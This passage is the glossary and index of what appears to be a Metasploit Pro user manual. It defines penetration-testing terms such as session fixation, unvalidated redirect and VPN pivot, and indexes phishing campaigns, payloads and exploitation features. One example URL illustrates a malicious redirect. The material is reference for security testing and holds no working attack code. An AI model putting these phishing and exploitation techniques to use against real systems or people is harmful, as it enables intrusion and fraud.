An attack method that enables an attacker to hijack an established user session by forcing the session identifier (ID) to a specific value. During a session fixation attack, the attacker sends a victim a URL that contains the fixed session, which forces the victims's browser to use the selected session.When the victim clicks on the URL, the web application establishes that a session already exists for the user and does not create a new session. Therefore, when the victim logs into web application, the attacker is able to access the account using the same sessionID.
Glossary
xvi
Shell
An interface that can be used to interact with a system.
Site
A Nexpose term for a collection of assets and asset groups.
Sites
Refers to a website, or a collection of web pages, that is defined by a fully qualified domain name or IP address. A site can also refer to a web application.
Target
A target can refer to the network, hosts, or type of systems that you want to exploit.
Target List
A list that defines the recipients and their e-mail addresses that will receive a phishing e-mail or some form of social engineering attack.
Task
An action that the system can perform, such as a scan, bruteforce attack, smart exploit, report generation, or data collection.
Glossary
xvii
Task Chain
A series of tasks that are linked together.
Task Schedule
The recurrence settings for a task chain. The task schedule determines the frequency at which the task chain runs.
Template
A reusable, shell of HTML that contains boilerplate that is used to quickly generate web page or e-mail content for a campaign.
Unauthorized Access
Refers to the ability to obtain entry to system and network resources without valid permissions. An attacker can exploit vulnerabilities in authentication services, FTP services, and web services to obtain unauthorized access in order to do things like modify security policies, steal user names and passwords, and escalate privileges.
Unvalidated Redirect
A request that accepts untrusted and unvalidated user-supplied parameters to specify the redirection of the target. If the application does not validate the input value, the victim can be redirected to a malicious URL. This attack method is typically used in phishing attacks to get victims to unknowingly visit a malicious site. To exploit an unvalidated redirect, an attacker may craft a URL that uses a domain of a trusted site, such as http://www.yoursite.com. However, the URL may include a redirect function, such as http://www.yoursite.com/redirect.aspx?url=http://www.mysite.com, that sends the victim to a malicious site designated by the attacker.
Vulnerable Version
Refers to a version of an application or software that has known security vulnerabilities.
Glossary
xviii
vhost
Refers to the fully qualified domain name of a virtual host or server. Typically, vhosts are devices that can be accessed remotely by users to host data or utilize software services.
VPN Pivot
An attack method that uses the compromised system to route network traffic.
Vulnerability
Aa security flaw or weakness in an application or system that enables an attacker to compromise the target system.
Vulnerability Exception
An exception defines a scenario where it is acceptable for a vulnerability to exist. When you define an exception for a vulnerability, you exclude it from a report and consider the vulnerability as an accepted risk. It also refers to a vulnerability found by Nexpose that Metasploit Pro was unable to exploit.
Vulnerable Target
A potentially exploitable machine.
Web Audit
A feature that performs vulnerability checks for XSS, LFI, RFI, and SQLi flaws.
Web Crawl
A feature that recursively parses a website or namespace for hyperlinks that point to other web pages and follows the links to those other pages.
Glossary
xix
Web Exploit
A feature that matches exploits to known web vulnerabilities to create an attack plan. Web exploit runs the attack plan after it has been created and attempts to exploit the identified vulnerabilities.
Web Page
Refers to an HTML document that resides on the World Wide Web.
Web Scan
A feature that analyzes web application configurations and security. A web scan crawls websites, audits them for misconfigurations and common vulnerability types, such as XSS, LFI, RFI, and SQLi vulnerabilities, and exploits the identified vulnerabilities.
Glossary
xx
Index
active session 329-330 Acunetix XML 129 administrator account 30 Amap Log 129 AppScan XML 129 asset 198 asset group 198, 212 authenticated web application scans 298 authentication note 331 authentication notes 218 automated exploit 235 automatic update 39 auxiliary module 118 Basic 298 bind shell payload 4 Browser Autopwn 343 bruteforce attack 218 Burp Session XML 129 campaign 349 create 351 definition 343 restrictions 349 campaign component 353
Campaign Dashboard 346 campaign findings 353 campaign reset 352 campaign state 349 campaign widget 347 click tracking 343 client-side exploit 339 command shell 330 Core Impact XML 130 custom scan template 205 Digest 298 Discovery Scan 4, 126-127, 135 e-mail alert 390 e-mail notification 355 e-mail template create 378 definition 343 executable definition 343 generate 383 exploit 235 Exploit 5, 235 exploit database 117 file format exploit about 339, 385 definition 343 download 386
xxii
generate 385 file system 334 Foundstone Network Inventory XML 129 Framework log 52 global settings 37 H.323 systems 136 host comment 112 add 112 host comments update 113 Host Details page 215 host tag 320 HTTP payloads 37 HTTPS payloads 38 human target 373 definition 344 text file 373 import 150 import data 204 IPv6 132 Java Signed Applet 339 John the Ripper 218 keyboard shortcut 27 keyword tags 121 Libcap 129 license key 44, 46 revert 48
xxiii
update 46 license key activation 45 License log 52 listener 237, 240 log files 52 LPORT 369 mail server 359 mail server configuration 359 malicious file 379 serving 380 malicious file attachment 379 manual exploit 235 Metasploit Framework 3 Metasploit Pro 2 Meterpreter 5, 331 Microsoft MBSA SecScan XML 129 module 3, 5, 237 excluded 118 module rankings 124 module search 121, 238 module statistics 123 modules about 117 nCircle IP360 129 Negotiate 298 Nessus NBE 129 Nessus XML 129
xxiv
NetSparker XML 129 network range 104 network range restriction 106 Nexpose 198-200 NeXpose 129 Nexpose asset group 212 Nexpose console 200 Nexpose raw XML 204 NeXpose Raw XML 129 Nexpose simple XML 204 NeXpose Simple XML 129 Nmap 138 Nmap command line 138 Nmap XML 129 non-administrator 30 NOP generator 118 NTLM 298 offline activation 47 offline update 58 pass the hash 207 Password 32 payload 5, 118 phishing 338, 387 phishing attack 344, 388 phishing campaign 387 Phishing Campaign Wizard 17
xxv
phishing e-mail create 389 portable file 369 about 340 create 369 download 371 Portable File 344 ports 128 post-exploitation module 118 Pro service error log 52 Production log 52 project 5, 97 create 98 view all 99 project members 109 project owner 102, 111 proof text 317 proxy pivot 332 purge 206 PWDump Export 129 Qualys Asset XML 129 Qualys Scan XML 129 Quick PenTest wizard 9 redirect page 368 resource file 344 restart services Linux 50
xxvi
Windows 50 result code 215 Retina XML 129 reverse shell 6 scan data 129 scan template 198 session clean up 392 shell 6 site 198 SMTP settings 40, 361 social engineering 336 definitioon 344 Social Engineering Campaign Details Report 393 generate 404 Spiceworks Inventory Summary CSV 130 SSL 299 tagged assets 208 target list 372, 374 CSV 373 definition 344 import 374 spreadsheet 374 target profile 10 task 6 task chain 408 team collaboration 109 template 375
xxvii
Thin log 52 time zone 35 tracking GIF 344 tracking link 345 tracking string definition 345 updates 57, 61 URL black list 298 USB key 383 user account 30, 34 user name requirements 36 virtual interfaces 333 visit definition 345 VM servers 133 VNC session 333 VPN pivot 332 vulnerability 6 vulnerability exception 187, 210 Web Application Assessment Report 305 web application exploit 303 web application test 297 Web Application Test Wizard 19 web application testing 19 web audit 301-302 web page 362
xxviii
web page template 376 create 375-376 web scan 296 Web server access log 52 Web server error log 52 web template 375 definition 345 wizard 9, 17 word list 232 word lists 233
xxix